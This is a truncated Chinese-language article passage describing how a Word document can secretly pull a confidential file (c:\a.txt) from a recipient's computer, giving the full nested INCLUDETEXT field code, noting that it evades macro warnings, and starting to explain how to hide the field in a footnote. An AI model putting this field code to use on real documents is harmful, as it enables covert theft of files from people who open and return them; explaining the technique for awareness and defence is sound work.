一、无声的攻击
下属B给领导A发了一个Word文档,按照正常的办公流程,领导A应该在修订、签署文档后把它发回给下属B。领导A先给Word文档杀毒,确认文档安全之后才打开它。但是,当最后领导A把已签字的文档发回给下属B时,这个Word文档却顺手牵羊,偷走了领导A电脑上的一份机密文档c:\a.txt。
那么,下属B是怎样完成这次窃密的呢?原来,下属B在文档中插入了一个INCLUDETEXT域。这个域插入到了文档最后一页的脚注之中,域的完整代码是:{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }。其中INCLUDETEXT域的作用就是把指定的文件嵌入到当前文档,但它不是宏,所以不会引起Word的安全警告。
用INCLUDETEXT域实施攻击时,有两个关键的问题需要解决:第一,必须隐藏INCLUDETEXT域,避免INCLUDETEXT域被领导A发现;第二,INCLUDETEXT域必须在经过一次更新操作后才会引入目标文件。
首先来看第一个问题。要隐藏INCLUDETEXT...[ 查看全文 ]